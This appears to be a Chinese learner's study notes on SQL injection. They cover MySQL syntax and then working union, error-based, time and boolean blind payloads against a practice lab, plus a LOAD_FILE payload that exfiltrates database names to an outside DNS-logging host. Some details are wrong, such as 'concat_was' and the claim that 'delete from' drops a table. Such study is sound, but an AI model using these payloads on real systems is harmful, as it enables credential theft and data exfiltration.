sql注入知识点总结

mysql基础知识

• 删除数据库 drop database 库名；
• 创建数据库 create database 库名；
  • php中使用sql语句来创建
  • $sql = 'create database database_name';
  • $retval = mysqli_query($coon,$sql);
• 选择数据库 use database_name；
  • php中使用 mysqli_select_db($conn,'database_name')
• 创建数据表
  • create table table_name(column1 datatype, column2 datatype);
• 插入数据
  • 使用insert into table_name(column1,column2,column3,...) values(value1,value2,value3,...);
  • 如果数据是字符型 需要用单引号或者双引号
  • 使用select * from table_name; 查询
• 使用 rename table table_name to newtable_name 来修改数据表的名称
• 使用 alter table table_name character set utf8 来修改字符级
• 使用 alter table table_name add column_name 数据类型 来增加一列内容
• 使用update table_name set column_name = xx 来修改所有该列名的值 可以通过 where xx = xx 限定
• alter table 表名 drop 列名 删除列
• delete from 表名 where xx=xx 删除行
• delete from 表名 删除表
• substring（主体，1,30）表示从1看到30
• concat（1,2） 表示拼接
• group_concat（） 同一行显示
• as a 表示别名为a as前面是某些语句 a表示查询的结果的别名
• count（*） 汇总函数
• rand() 随即返回0~1之间的小数
• floor（） 小数向下取整数 向上取整数用ceiling（）
• concat_was（） 将括号内的数据用第一个字段连接起来
• group by 分组
• limit 用来显示指定行数

information_schema

• 这是一个元数据库 其中包含很多表 比如下面三个 打开某个表后 就能看见里面的字段有什么
• 其中包含一些表
• SCHEMATA： 包含关于数据库实例的信息，如数据库名称、所有者等。
• TABLES： 包含关于数据库中表的信息，如表名称、所属数据库、表类型等。
• COLUMNS： 包含关于表中列的信息，如列名称、数据类型、是否为主键等。

查询注入模块

字符型与数字型的区分以及闭合方式的区分

数字型注入

• 可以使用 id = 1 和id = 2-1来看结果是不是相同

• 再用id = 3-1 等查看（如果2不在数据库中则返回NULL）
  字符型注入

• 例如 username= 'or 1=1 #

• 实际执行的语句为 select id from users where username=' 'or 1=1 #'

• 因为username=空返回false 但1 =1 为true 所以是true

• 所以会返回所有结果集

联合查询

union注入

• union是一个sql关键字，union可以将两个select语句的结果合并到一个结果集中，但要求两个select语句拥有相同的列数。
• 例如 select username from users where id=0 union select password from users
• 用union查询的时候 必须保证前后的列数相等 如果不等可以在select 后面随意加，x
• 用 group by order by 来判断列数
• limit 限制输出的数量 比如 加上 limit 1,3 表示从第一行开始显示3行
• group_concat 多行合并为一行输出回显

报错注入

• 利用报错之 extractvalue报错注入
• http://sql/Less-5/?id=1' and 1=extractvalue(2,concat(0x7e,(select database()))) --+
• http://sql/Less-5/?id=1' and 1=extractvalue(2,concat(0x7e,(select group_concat(username,password) from users))) --+
• updatexml updatexml（1,2,3） 其中2写payload
• floor

时间盲注

• username=' or sleep(1) #
• 会产生一秒左右延迟
• 使用if函数进行条件判断 当if第一个参数为真时进行延时
• 输入username=' or if(1=1,sleep(1),1) #
• 当第一个参数为真时执行第二个参数 为假时执行第三个参数
• 可以用substr函数来判断真假 通过有无延迟判断是否重合

布尔盲注

• username=' or substr(password, ,1)='1' #
• substr 是一个字符串截取函数 第一个参数是要截取的字符串 第二个是截取开始的位置 第三个是截取长度
• 通过burp或者python脚本进行盲注

dns注入

• 使用一些第三方平台 平台会给我们子域名 然后我们用load_file（） 命令 去读取子域名 会进行dns解析 然后第三方平台会记录解析行为 然后用concat拼接上payload 最后第三方平台查看回显
• http://sql/Less-9/?id=1' and (SELECT LOAD_FILE(CONCAT('\\',(SELECT database()),'.k3dxl3.ceye.io\test.txt'))) --+